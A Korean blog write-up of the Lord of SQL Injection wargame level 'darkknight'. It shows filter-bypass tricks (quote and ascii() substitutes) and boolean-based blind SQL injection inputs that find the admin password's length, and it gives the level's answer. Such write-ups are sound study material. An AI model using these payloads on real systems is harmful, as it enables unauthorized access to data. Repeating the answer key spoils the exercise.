관리 메뉴

Information Security

[LOS] 12. darkknight 본문

WarGame/Lord of SQL Injection

[LOS] 12. darkknight

HackingPractice 2020. 8. 8. 12:26

그림 12-1 문제

'(싱글쿼터) 우회 "(더블쿼터), `, hex, binary, char() 사용
ascii() 우회 ord() 사용

?no=0 or true 입력 시 Hello guest 메시지가 출력되는 것을 알 수 있다.

그림 12-2 guest

?no=1 or id like "admin" 입력 시 Hello admin 메시지가 출력되는 것을 알 수 있다.

그림 12-3 admin

?no=1 or length(pw) like 8 입력 시 Hello admin 메시지가 출력되는 것을 알 수 있다.

그림 12-4 true

?no=1 or length(pw) like 9 입력 시 Hello guest가 출력되는 것을 알 수 있다.

그림 12-5 false
그림 12-6 소스코드 

?pw=1c62ba6f라는 것을 알 수 있다.

그림 12-7 정답

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOS] 14. giant  (0) 2020.08.08
[LOS] 13. bugbear  (0) 2020.08.08
[LOS] 11. golem  (0) 2020.08.08
[LOS] 10. skeleton  (0) 2020.02.19
[LOS] 9. vampire  (0) 2020.01.06